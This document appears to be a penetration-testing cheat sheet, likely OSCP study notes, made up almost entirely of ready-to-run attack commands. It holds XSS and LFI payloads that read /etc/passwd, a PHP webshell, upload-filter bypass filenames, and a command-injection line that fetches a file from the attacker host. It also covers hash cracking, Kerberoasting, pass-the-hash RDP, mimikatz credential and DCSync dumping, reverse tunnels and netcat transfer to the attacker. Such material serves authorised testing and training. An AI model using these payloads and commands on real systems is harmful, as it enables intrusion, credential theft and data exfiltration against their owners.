#### Prep
```
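# TCP: all ports, version detection + default NSE scripts (-sVC), no host discovery (-Pn);
# targets read from hosts.txt, every output format written as scan.*
nmap -vvv -Pn -sVC -p- -iL hosts.txt -oA scan
# UDP needs root; a full -p- UDP sweep is very slow (retransmits on every open|filtered port),
# so consider --top-ports 100 first and only go full-range on interesting hosts
sudo nmap -vvv -Pn -sU -p- <RHOST> -oA scan-udp
# add any hostnames seen in redirects/certificates/vhosts to /etc/hosts before web enumeration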
```
#### curl
```
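curl -v http://<DOMAIN>              # verbose: print request and response headers
curl -X POST http://<DOMAIN>         # POST method
curl -X PUT http://<DOMAIN>          # PUT method
# --path-as-is sends /../ and /./ literally instead of normalising them client-side (path traversal tests)
curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd
# route the request through an intercepting proxy (e.g. Burp on 8080)
curl --proxy http://127.0.0.1:8080 http://<DOMAIN>
curl -F myFile=@<FILE> http://<RHOST>   # multipart/form-data file upload
# command-injection filter bypass when the space character is blocked: ${IFS} expands to whitespace
curl${IFS}<LHOST>/<FILE>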
```
#### web
```
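# --- jwt: decode, tamper and attack tokens (alg:none, key confusion, weak HMAC secret)
python3 ~/Desktop/oscp/useful/jwt_tool/jwt_tool.py <JWT>
# https://jwt.io  (decode only; do not paste real customer/production tokens into a third-party site)
# --- lfi: fuzz the include parameter; -fs hides responses of the baseline size (15349 is target-specific, re-measure it)
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://<RHOST>/admin../admin_staging/index.php?page=FUZZ' -fs 15349
# --- xss to lfi: only discloses local files when the HTML is rendered by a local/headless renderer
# (e.g. server-side PDF/report generation); a normal browser refuses file:// from an http(s) origin
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
# --- api: endpoint brute force; -ac auto-calibrates the filters, -fc drops the listed status codes
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
# --- file discovery: directory + extension brute force
# -mc = status codes to keep, -ic strips wordlist comment lines, -H sets a browser User-Agent
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
  -mc 200,204,301,302,307,401,403,500 -ic \
  -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
# --- dir brute force against an API root: -e prints full URLs, -s keeps only HTTP 200
# (gobuster >= 3.1 also needs -b '' here, because -s conflicts with the default 404 blacklist)
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200
# --- dns recon: subdomain brute force; -d needs a domain name, not an IP
gobuster dns -d <DOMAIN> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d <DOMAIN> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
# --- cms scanners
# joomla:  https://github.com/oppsec/juumla
# drupal:  https://github.com/SamJoan/droopescan
# magento: https://github.com/steverobbins/magescan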
```
#### WPScan
```
# enumerate users (u), themes (t) and plugins (p); vulnerability data for the findings needs a WPScan API token
wpscan --url https://<RHOST> --enumerate u,t,p
# aggressive mode requests every known plugin path directly: thorough but very noisy in the target's logs
wpscan --url https://<RHOST> --plugins-detection aggressive
# self-signed / invalid certificate on the target
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p
# password attack against wp-login/xmlrpc with 50 threads; check for lockout plugins first
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
```
#### PHP
```
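# --- php://filter: read PHP source through an include without executing it (base64 keeps the output from being interpreted)
url=php://filter/convert.base64-encode/resource=file:///var/www/<RHOST>/api.php
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d <FILE>.php    # decode the dumped source
# minimal webshell to embed in an uploaded file (e.g. inside a "pdf"), then include it through the LFI
<?php
system($_GET["cmd"]);
?>
# %00 truncates the include path only on PHP < 5.3.4; on newer PHP include the file as-is or use a rename trick below
http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami
# --- upload filter bypass: alternative extensions a misconfigured handler may still execute or parse as PHP
.sh
.cgi
.inc
.txt
.pht
.phtml
.phtm
.phP
.Php
.php3
.php4
.php5
.php7
.phps
.phar
.phpt
.pgif
# --- filename tricks: trailing whitespace/CRLF, double extensions, null-byte truncation
<FILE>.php%20
<FILE>.php%0a
<FILE>.php%0d%0a.jpg
<FILE>.php.jpg
<FILE>.php%00.jpeg
<FILE>.php%00.gif
<FILE>.php%00.png
<FILE>.php%00.jpg
<FILE>.php\x00.gif
<FILE>.php\x00.png
<FILE>.php\x00.jpg
# "\x00" above is payload notation: a Linux filename cannot contain a real NUL byte, so this rename only
# produces a literal backslash-x-0-0 name; set the raw 0x00 byte in the multipart filename (e.g. in Burp) instead
mv <FILE>.jpg '<FILE>.php\x00.jpg'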
```
#### GitTools
```
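# dump an exposed .git/ (works without directory listing) into a local folder
./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/DUMP
# recover every commit's files from the dumped objects; use a separate, empty output folder
./extractor.sh /PATH/TO/DUMP /PATH/TO/EXTRACTED
# then review history for removed secrets: git -C /PATH/TO/DUMP log --all ; git -C /PATH/TO/DUMP diff <OLD> <NEW>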
```
#### DB
```
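# --- mssql (impacket): password is prompted when omitted; -windows-auth for NTLM/domain logins
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
impacket-mssqlclient <DOMAIN>/<USERNAME>:<PASSWORD>@<RHOST> -windows-auth
# sqlcmd client; a -P password on the command line is visible in ps and shell history, prefer the prompt
sqlcmd -S <RHOST> -U <USERNAME>
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
# list a directory from inside MSSQL; pointed at a UNC path (\\<LHOST>\share) it also makes the
# SQL service account authenticate to you (NTLM capture with responder / ntlmrelayx)
EXEC master.sys.xp_dirtree N'C:\inetpub\wwwroot\',1,1;
# --- mongodb
mongo "mongodb://localhost:27017"
# --- mysql
mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p
SELECT LOAD_FILE('/etc/passwd');   -- needs the FILE privilege and secure_file_priv must allow the path
# --- postgres
psql
psql -h <RHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>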
```
#### Shell
```
https://github.com/ivan-sincek/php-reverse-shell   (PHP reverse shell)
https://github.com/tennc/webshell                  (webshell collection, many languages)
https://github.com/TheBinitGhimire/Web-Shells      (webshell collection)
```
#### ftp
```
# interactive client; try anonymous / anonymous@ first, then `ls -la` for hidden files
ftp <RHOST>
# mirror everything the anonymous account can read into ./<RHOST>/
wget -r ftp://anonymous:anonymous@<RHOST>
```
#### password
```
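# hashcat -m <mode> <HASHFILE> <WORDLIST>; the hash type is selected by mode (see `hashcat --example-hashes`)
hashcat -m 0    <HASHFILE> /usr/share/wordlists/rockyou.txt   # MD5
hashcat -m 100  <HASHFILE> /usr/share/wordlists/rockyou.txt   # SHA-1
hashcat -m 1400 <HASHFILE> /usr/share/wordlists/rockyou.txt   # SHA-256
hashcat -m 3200 <HASHFILE> /usr/share/wordlists/rockyou.txt   # bcrypt (slow by design: use a small, targeted list)
hashcat -m 900  <HASHFILE> /usr/share/wordlists/rockyou.txt   # MD4
hashcat -m 1000 <HASHFILE> /usr/share/wordlists/rockyou.txt   # NTLM
hashcat -m 1800 <HASHFILE> /usr/share/wordlists/rockyou.txt   # sha512crypt ($6$, Linux /etc/shadow) - raw SHA-512 is 1700
hashcat -m 160  <HASHFILE> /usr/share/wordlists/rockyou.txt   # HMAC-SHA1, key = $salt
# -O uses optimized kernels (limits candidate length); --force only silences warnings and can mask bad results, leave it off
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O
# mask attack on md5crypt ($1$): custom charsets ?1=lowercase ?2=digit ?3=uppercase, pattern Uu llll d U
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u hash.txt ?3?3?1?1?1?1?2?3
# AS-REP roast ($krb5asrep$23$...)
hashcat -m 18200 -a 0 <HASHFILE> <WORDLIST>
# Kerberoast, TGS-REP etype 23 ($krb5tgs$23$...)
hashcat -m 13100 <HASHFILE> /usr/share/wordlists/rockyou.txt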
```
#### evil-winrm
```
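# password auth over WinRM (5985); the password on the command line is visible in ps and shell history
evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
# certificate auth: -c / -k only work together with -S (WinRM over HTTPS, 5986)
evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -S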
```
#### rdp
```
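# password login; +clipboard shares the clipboard with the session
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard
# pass-the-hash: only works when the target has Restricted Admin mode enabled (DisableRestrictedAdmin = 0)
xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /dynamic-resolution +clipboard
# legacy targets: lowest TLS security level and no NLA (credentials go to the login screen instead)
xfreerdp /v:<RHOST> /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla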
```
#### smb
```
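# list shares, null session (no password)
smbclient -L //<RHOST>/ -N
smbclient -L //<RHOST>/ --no-pass
# list shares, authenticated; user%pass on the command line lands in ps and shell history
smbclient -L //<RHOST>/ -U '<USERNAME>%<PASSWORD>'
smbclient -L //<RHOST>/ -U '<USERNAME>'              # prompts for the password
# UNC form works too but must be single-quoted, otherwise the shell strips the backslashes
smbclient -L '\\<RHOST>\' -U '<USERNAME>'
# connect to a share
smbclient //<RHOST>/<SHARE> -U '<USERNAME>'
smbclient --no-pass //<RHOST>/<SHARE>
smbclient //<RHOST>/SYSVOL -U '<USERNAME>%<PASSWORD>'   # GPP cPassword, logon scripts
smbclient '\\<RHOST>\<SHARE>' -U '<USERNAME>'
# large transfers over slow links: tuned socket buffers and a 40000 s per-operation timeout (-t)
smbclient '\\<RHOST>\<SHARE>' -U '<USERNAME>' -t 40000 \
  --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072'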
```
#### impacket
```
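# AS-REP roasting: request TGTs for accounts that have "Do not require Kerberos preauthentication" set
# (no credentials needed, only a user list); crack with hashcat -m 18200 / john
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
# single known user; -dc-ip when the DC is not resolvable by domain name
impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>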
```
#### windows
```
:: file system: include hidden (/a), only directories (/a:d), only hidden (/a:h)
dir /a
dir /a:d
dir /a:h
:: recursive searches: flag files, logs (bare paths with /b)
dir flag* /s /p
dir /s /b *.log
:: host and identity: patch level, privileges/groups, local and domain users
systeminfo
whoami /all
net user
net user /domain
net user <USERNAME>
tree /f C:\Users\
:: processes, services and their binaries (look for unquoted paths / writable service binaries)
tasklist /SVC
sc query
sc qc <SERVICE>
:: legacy firewall context; on current Windows use: netsh advfirewall show allprofiles
netsh firewall show state
:: scheduled tasks with full details (run-as user, command, writable script paths)
schtasks /query /fo LIST /v
:: credential hunting in config files
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *cred* == *vnc* == *.config*
:: Sysinternals accesschk: what "Everyone" can write under Program Files (-u suppress errors, -w write, -s recurse)
accesschk.exe -uws "Everyone" "C:\Program Files\"
:: installed hotfixes (wmic is deprecated on recent Windows; Get-HotFix is the PowerShell equivalent)
wmic qfe get Caption,Description,HotFixID,InstalledOn
:: PowerShell: third-party drivers (look for known-vulnerable ones)
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
```
#### mimikatz
```
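# most sekurlsa::/lsadump:: commands need SeDebugPrivilege first
privilege::debug
# impersonate SYSTEM (needed for lsadump::sam/secrets/cache), then drop back
token::elevate
token::revert
# Windows Credential Manager / vault
vault::cred
vault::list
# local SAM hashes, LSA secrets, cached domain logons (mscache)
lsadump::sam
lsadump::secrets
lsadump::cache
# DCSync: pull krbtgt from the DC over replication (needs DA or GetChanges/GetChangesAll on the domain)
lsadump::dcsync /user:<DOMAIN>\krbtgt /domain:<DOMAIN>
# parse an offline LSASS dump (Task Manager, procdump) instead of touching the live process
sekurlsa::minidump <PATH>\lsass.DMP
sekurlsa::logonPasswords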
```
#### linux
```
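# suid / sudo / readable-file escalation: look each binary up on https://gtfobins.github.io
id
sudo -l                                   # NOPASSWD entries, env_keep (LD_PRELOAD / PYTHONPATH)
find / -perm -4000 -type f 2>/dev/null    # SUID binaries
uname -a                                  # kernel version for exploit matching
env
cat /etc/hosts
cat /etc/fstab                            # extra mounts, NFS shares, credentials in mount options
cat /etc/passwd                           # users with a shell; if it is writable you can add a root user
ss -tulpn                                 # services bound to 127.0.0.1 only -> tunnel them (chisel)
ps auxf                                   # BSD syntax, no dash: `ps -auxf` only works through a compatibility fallback
ls -lahv
ls -R /home
ls -la /opt
capsh --print                             # capabilities of the current shell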
```
#### tunnelling
```
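# reverse port forward: server on the attacker (<LHOST>), client on the pivot;
# R:3000:127.0.0.1:3000 makes the pivot's local port 3000 reachable on the attacker's 127.0.0.1:3000
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:3000:127.0.0.1:3000
# reverse SOCKS: the attacker gets a SOCKS5 proxy on 127.0.0.1:1080 through the pivot (use with proxychains)
./chisel server -p 5000 -reverse -v
./chisel client <LHOST>:5000 R:socks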
```
#### ssh
```
```
#### file transfer
```
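# the listener serves the file, the connecting side writes it (roles can be swapped: listener "> file", client "< file");
# nc does not exit on its own - Ctrl-C once the byte count stops, then compare md5sum on both ends
nc -lnvp <LPORT> < <FILE>       # on the host that has the file
nc <LHOST> <LPORT> > <FILE>     # on the host that wants it (<LHOST> = the listener)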
```
#### phishing
```
```